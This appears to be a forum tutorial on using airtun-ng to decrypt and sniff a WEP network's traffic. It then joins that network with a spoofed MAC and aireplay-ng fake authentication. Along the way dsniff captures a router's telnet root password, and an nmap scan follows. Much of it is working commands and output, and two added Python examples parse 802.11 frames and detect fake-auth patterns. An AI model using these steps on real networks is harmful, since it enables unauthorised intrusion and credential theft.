In this post I will show you how you can use airtun-ng to create a virtual interface which will allow you to monitor WLAN traffic in real-time with an IDS or other packet sniffer, and at the same time, use the virtual interface to inject traffic and essentially become a client of the network.

The following is the info for the AP in this demonstration:

essid: airtun-demo
mac: 00:18:F8:F0:00:01
wep: 5CE6A435786A4135A512EB6FB5
channel: 11

The first thing we will do is make sure our card is in monitor mode on the appropriate channel:
Code:
airmon-ng stop ath0
airmon-ng start wifi0 11
Then we will run the following airtun-ng command:
Code:
bt ~ # airtun-ng -a 00:18:F8:F0:00:01 -w 5CE6A435786A4135A512EB6FB5 -t 1 ath0
created tap interface at0
WEP encryption specified. Sending and receiving frames through ath0.
ToDS bit set in all frames.
"-a" specifies the BSSID of the target AP and "-w" is the WEP key (I am assuming you already cracked/know it for this example). One important option is "-t". I specified a value of 1 for this example because I just want to communicate with the AP and/or wired clients: it sets the ToDS bit in every frame we send, so the AP accepts them and forwards them onto the wired side. If you change it to 0, the frames are built with FromDS instead of ToDS, as if they came from the AP, which should allow you to communicate with wireless clients. Try playing with this setting if you cannot reach certain hosts.

Also, if you receive the following error message...
Code:
error opening tap device: No such file or directory
try "modprobe tun"
error opening tap device: No such file or directory
...just run "modprobe tun" from the shell before starting airtun-ng.


So now that airtun-ng is running, we can use any packet capture utility we want to monitor the wireless traffic. This could be your Snort IDS, Wireshark for analysis, or driftnet to be creepy and grab web pics. I used dsniff here to grab a telnet password to the wireless router:
Code:
bt ~ # dsniff -i at0
dsniff: listening on at0

-----------------
03/07/09 20:15:19 tcp 192.168.1.105.49895 -> DD-WRT.23 (telnet)
root
admin
Normally, utilities like these would give you "unknown data-link type" errors when trying to start a capture on the monitor-mode interface, but the at0 interface created by airtun-ng re-emits all the traffic for us, decrypted with the WEP key and with the 802.11 header removed, so it looks like standard Ethernet in the eyes of our sniffer programs.
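To make the "-t" discussion above and the 802.11-to-Ethernet translation concrete, here is an added example (written for this post, not code from aircrack-ng): it parses the MAC header of an 802.11 data frame, reads the ToDS/FromDS bits to work out which address field is the source, destination and BSSID, strips the LLC/SNAP header, and emits an Ethernet II frame the way at0 presents traffic to a sniffer. The sample frames are constructed by hand; the MAC addresses are the ones that appear in the command output in this post. Protected (encrypted) frames are returned as None, since decryption is the part airtun-ng does with the key from "-w" and is not shown here.

```python
"""Convert 802.11 data frames to Ethernet II frames, as airtun-ng's at0
tap interface presents WLAN traffic to an ordinary sniffer.

Added example for this post, not part of aircrack-ng. The sample frames
below are constructed; the MAC addresses come from the post's output.
"""
import struct
from dataclasses import dataclass
from typing import Optional

# 802.11 data frames carry an LLC/SNAP header in front of the EtherType.
LLC_SNAP = b"\xaa\xaa\x03\x00\x00\x00"


@dataclass
class DataFrame:
    to_ds: bool
    from_ds: bool
    protected: bool
    sa: bytes      # source station
    da: bytes      # destination station
    bssid: bytes   # AP address (non-WDS cases only, see below)
    body: bytes    # frame body after the MAC header


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_data_frame(frame: bytes) -> DataFrame:
    """Parse the MAC header of an 802.11 data frame (FCS already stripped)."""
    if len(frame) < 24:
        raise ValueError("frame shorter than a minimal 802.11 MAC header")
    fc = struct.unpack_from("<H", frame, 0)[0]   # frame control, little-endian
    ftype = (fc >> 2) & 0x3
    subtype = (fc >> 4) & 0xF
    if ftype != 2:
        raise ValueError("not a data frame (type %d)" % ftype)
    to_ds = bool(fc & 0x0100)
    from_ds = bool(fc & 0x0200)
    protected = bool(fc & 0x4000)
    if to_ds and from_ds:
        raise ValueError("WDS (4-address) frames are not handled in this example")
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    offset = 24
    if subtype & 0x08:        # QoS data: a 2-byte QoS control field follows the header
        offset += 2
    # The meaning of the address fields depends on ToDS/FromDS, which is what
    # airtun-ng's -t option controls: -t 1 sets ToDS (station -> AP).
    if to_ds:                 # station -> AP: Addr1=BSSID, Addr2=SA, Addr3=DA
        bssid, sa, da = addr1, addr2, addr3
    elif from_ds:             # AP -> station: Addr1=DA, Addr2=BSSID, Addr3=SA
        da, bssid, sa = addr1, addr2, addr3
    else:                     # direct/ad-hoc: Addr1=DA, Addr2=SA, Addr3=BSSID
        da, sa, bssid = addr1, addr2, addr3
    return DataFrame(to_ds, from_ds, protected, sa, da, bssid, frame[offset:])


def to_ethernet(frame: bytes) -> Optional[bytes]:
    """Return an Ethernet II frame (DA, SA, EtherType, payload) or None.

    Encrypted frames return None: decrypting them is what airtun-ng does
    with the WEP key given by -w, and is outside this example.
    """
    d = parse_data_frame(frame)
    if d.protected:
        return None
    if len(d.body) < 8 or not d.body.startswith(LLC_SNAP):
        return None           # no SNAP header, nothing Ethernet-shaped to emit
    ethertype = d.body[6:8]
    return d.da + d.sa + ethertype + d.body[8:]


# --- constructed sample frames (addresses taken from the post's output) ---
BSSID = bytes.fromhex("0018f8f00001")     # the AP
STA = bytes.fromhex("00156d540001")       # the ath0 card
LAN_HOST = bytes.fromhex("0018f8fc00a0")  # router's Ethernet MAC from the nmap run
PAYLOAD = b"constructed IPv4 payload"


def build_data_frame(to_ds: bool, from_ds: bool, sa: bytes, da: bytes,
                     bssid: bytes, payload: bytes, protected: bool = False) -> bytes:
    """Build a plain (non-QoS) 802.11 data frame carrying an IPv4 LLC/SNAP body."""
    fc_lo = 0x08                            # type=2 (data), subtype=0
    fc_hi = (0x01 if to_ds else 0) | (0x02 if from_ds else 0) | (0x40 if protected else 0)
    if to_ds:
        a1, a2, a3 = bssid, sa, da
    elif from_ds:
        a1, a2, a3 = da, bssid, sa
    else:
        a1, a2, a3 = da, sa, bssid
    header = bytes([fc_lo, fc_hi]) + b"\x00\x00" + a1 + a2 + a3 + b"\x10\x00"
    return header + LLC_SNAP + b"\x08\x00" + payload


if __name__ == "__main__":
    uplink = build_data_frame(True, False, STA, LAN_HOST, BSSID, PAYLOAD)
    eth = to_ethernet(uplink)
    print("dst", mac_str(eth[:6]), "src", mac_str(eth[6:12]), "type", eth[12:14].hex())
```

Running it prints the router MAC as destination and the card MAC as source, which is exactly what a sniffer on at0 sees: the BSSID and the 802.11 header are gone, and only an Ethernet frame remains.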

Well, this is spectacular, but what if you want to take it further? You can't scan the network or perform MITM attacks without being able to send packets into the network. I guess you could always just use another wireless interface for this part, but that would defeat the purpose of this "how-to"! Also, if you are having trouble connecting to WEP networks with your current card driver, you could actually tunnel all your traffic through airtun-ng and take your driver limitations out of the equation (assuming your card supports injection). Plus, some people may only have 1 interface to work with.

First, we need to clone the mac of our interface we are using to capture the wireless traffic, and assign it to our at0 interface. Otherwise, the AP will not know what to do with our packets once it receives them. It needs to know the actual physical interface to respond to.
Code:
bt ~ # ifconfig ath0

ath0      Link encap:UNSPEC  HWaddr 00-15-6D-54-00-01-A8-0F-00-00-00-00-00-00-00-00
          UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI  MTU:1500  Metric:1
          RX packets:11808 errors:0 dropped:0 overruns:0 frame:0
          TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:2880777 (2.7 MiB)  TX bytes:227 (227.0 b)
^^ Checking the ath0 MAC

Now let's assign it to our tunnel interface...
Code:
bt ~ # macchanger -m 00:15:6D:54:00:01 at0
Current MAC: 82:cf:78:7e:22:22 (unknown)
Faked MAC:   00:15:6d:54:00:01 (unknown)
Now it is assigned to our virtual interface.

And one final requirement before we can inject traffic: we need to associate ourselves with the target AP. For this we will use a simple aireplay-ng command.
Code:
bt ~ # aireplay-ng -a 00:18:F8:F0:00:01 --fakeauth 5 ath0
No source MAC (-h) specified. Using the device MAC (00:15:6D:54:00:01)
20:13:05  Waiting for beacon frame (BSSID: 00:18:F8:F0:00:01) on channel 11

20:13:06  Sending Authentication Request (Open System) [ACK]
20:13:06  Authentication successful
20:13:06  Sending Association Request [ACK]
20:13:06  Association successful :-) (AID: 1)
"-a" is the BSSID of our target AP, "--fakeauth 5" says to re-associate every 5 seconds, and ath0 is our replay interface.
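From the defender's side, the "--fakeauth 5" behaviour above is easy to spot: a real client authenticates once per session and only authenticates again after a deauthentication or when it roams, whereas this station sends a fresh authentication/association pair every 5 seconds while it is still associated. The following is an added example (written for this post, not part of aircrack-ng or any IDS) that flags that pattern over a small constructed log of management-frame events; the event format is invented for the example, and the station and AP addresses are the ones in this post's output.

```python
"""Flag stations that keep re-authenticating while already associated, the
pattern that a scripted tool sending auth/assoc every N seconds produces.

Added example for this post, not part of aircrack-ng or any IDS. The
'HH:MM:SS KIND STA BSSID' event format is constructed for the example;
a real deployment would feed it from a monitor-mode capture.
"""
from collections import defaultdict
from statistics import mean
from typing import Dict, List, Tuple

Event = Tuple[int, str, str, str]   # (seconds since midnight, kind, station, bssid)

# Constructed log. First station: auth/assoc every 5 s while still associated
# (and even while passing data). Second station: an ordinary client that
# reconnects once after being deauthenticated.
SAMPLE_LOG = """
20:13:06 AUTH   00:15:6d:54:00:01 00:18:f8:f0:00:01
20:13:06 ASSOC  00:15:6d:54:00:01 00:18:f8:f0:00:01
20:13:11 AUTH   00:15:6d:54:00:01 00:18:f8:f0:00:01
20:13:11 ASSOC  00:15:6d:54:00:01 00:18:f8:f0:00:01
20:13:14 DATA   00:15:6d:54:00:01 00:18:f8:f0:00:01
20:13:16 AUTH   00:15:6d:54:00:01 00:18:f8:f0:00:01
20:13:16 ASSOC  00:15:6d:54:00:01 00:18:f8:f0:00:01
20:13:21 AUTH   00:15:6d:54:00:01 00:18:f8:f0:00:01
20:13:21 ASSOC  00:15:6d:54:00:01 00:18:f8:f0:00:01
20:13:08 AUTH   00:1c:b3:00:00:42 00:18:f8:f0:00:01
20:13:08 ASSOC  00:1c:b3:00:00:42 00:18:f8:f0:00:01
20:13:09 DATA   00:1c:b3:00:00:42 00:18:f8:f0:00:01
20:13:30 DEAUTH 00:1c:b3:00:00:42 00:18:f8:f0:00:01
20:13:40 AUTH   00:1c:b3:00:00:42 00:18:f8:f0:00:01
20:13:40 ASSOC  00:1c:b3:00:00:42 00:18:f8:f0:00:01
"""


def parse_events(lines: List[str]) -> List[Event]:
    """Parse 'HH:MM:SS KIND STA BSSID' lines, sorted by time (stable within a second)."""
    events = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, kind, sta, bssid = line.split()
        h, m, s = (int(x) for x in ts.split(":"))
        events.append((h * 3600 + m * 60 + s, kind.upper(), sta.lower(), bssid.lower()))
    events.sort(key=lambda e: e[0])
    return events


def find_fake_auth(events: List[Event], min_repeats: int = 3,
                   jitter: float = 1.0) -> Dict[Tuple[str, str], dict]:
    """Return {(sta, bssid): summary} for stations that re-authenticate while associated.

    An AUTH arriving from a station we have already seen ASSOC, with no
    DEAUTH/DISASSOC in between, is counted as a re-auth. min_repeats such
    re-auths with near-constant spacing (max gap - min gap <= jitter) is reported.
    """
    associated: Dict[Tuple[str, str], bool] = defaultdict(bool)
    reauth_times: Dict[Tuple[str, str], List[int]] = defaultdict(list)
    for ts, kind, sta, bssid in events:
        key = (sta, bssid)
        if kind == "AUTH":
            if associated[key]:
                reauth_times[key].append(ts)
        elif kind == "ASSOC":
            associated[key] = True
        elif kind in ("DEAUTH", "DISASSOC"):
            associated[key] = False
    findings = {}
    for key, times in reauth_times.items():
        if len(times) < min_repeats:
            continue
        gaps = [b - a for a, b in zip(times, times[1:])]
        findings[key] = {
            "reauths": len(times),
            "interval": mean(gaps) if gaps else 0.0,
            "regular": bool(gaps) and (max(gaps) - min(gaps)) <= jitter,
        }
    return findings


if __name__ == "__main__":
    for (sta, bssid), info in find_fake_auth(parse_events(SAMPLE_LOG.splitlines())).items():
        print(f"{sta} -> {bssid}: {info['reauths']} re-auths while associated, "
              f"every ~{info['interval']}s, regular={info['regular']}")
```

Only the first station is reported (three re-auths at a steady 5 s); the ordinary client is not, because its second authentication follows a deauth. The same state machine works on real management frames: the AP's own logs or a monitor-mode capture give you the AUTH/ASSOC/DEAUTH events, and DATA is only there to show that traffic in between does not hide the pattern.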

Now we are good to go.

Let's bring up the at0 interface... (airtun-ng will always start with the interface down)
Code:
ifconfig at0 up
Let's see if the AP will give us an address via DHCP.

Code:
bt ~ # dhcpcd at0
bt ~ # ifconfig at0
at0       Link encap:Ethernet  HWaddr 00:15:6D:54:00:01
          inet addr:192.168.1.109  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:11 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500
          RX bytes:3290 (3.2 KiB)  TX bytes:1240 (1.2 KiB)
Ta-da! We are now sniffing all wireless traffic for this AP in promiscuous mode, and are also joined to the network and can inject and receive packets like a normal host. All with the same physical interface.


Pinging the AP...
Code:
bt ~ # ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=4.98 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=2.33 ms
64 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=2.34 ms
64 bytes from 192.168.1.1: icmp_seq=4 ttl=64 time=2.32 ms
64 bytes from 192.168.1.1: icmp_seq=5 ttl=64 time=2.33 ms

--- 192.168.1.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4001ms
rtt min/avg/max/mdev = 2.321/2.863/4.984/1.060 ms
A quick port scan...
Code:
bt ~ # nmap -e at0 -F 192.168.1.1

Starting Nmap 4.85BETA3 ( hxxp://nmap.org ) at 2009-03-07 20:19 GMT
Interesting ports on DD-WRT (192.168.1.1):
Not shown: 97 closed ports
PORT   STATE SERVICE
23/tcp open  telnet
53/tcp open  domain
80/tcp open  http
MAC Address: 00:18:F8:FC:00:A0 (Cisco-Linksys)

Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
You will probably need to specify the interface to use for scanning with nmap ("-e at0"). When I didn't, it gave me an error and defaulted to eth0. This may be the case with other programs also.



So there you have it. If anyone has any pointers or criticisms please let me know. Thanks.